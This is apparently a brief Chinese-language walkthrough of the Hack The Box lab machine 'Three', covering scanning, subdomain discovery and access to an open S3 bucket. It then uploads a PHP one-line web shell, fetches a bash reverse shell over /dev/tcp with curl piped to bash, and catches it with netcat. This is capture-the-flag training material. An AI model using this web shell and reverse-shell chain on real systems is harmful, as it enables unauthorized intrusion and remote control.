1. nmap探测：
    sudo nmap -sV -oN three.nmap 10.129.1.90
        22
        80

2. 80 port:
    发现域名：thetoppers.htb

3. 子域名爆破
    sudo gobuster vhost -w ~/2.mytools/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -o dobuster.txt
    发现子域名：s3.thetoppers.htb

4. 用awscli工具访问 S3 bucket
    aws configure
    aws --endpoint=http://s3.thetoppers.htb s3 ls

5. 查看存储的文件
    aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

6. 上传文件一句话shell
    echo '<?php system($_GET["cmd"]); ?>' > shell.php
    aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
    http://thetoppers.htb/shell.php?cmd=id

7. 制作reverse shell
   本机shell.sh 文件内容：
        #!/bin/bash
        bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1
   python3 -m http.server 8000

   远程下载reverse shell并执行
   http://thetoppers.htb/shell.php?cmd=curl%20<YOUR_IP_ADDRESS>:8000/shell.sh|bash

8. 本机监听1337端口：
    nc -nvlp 1337
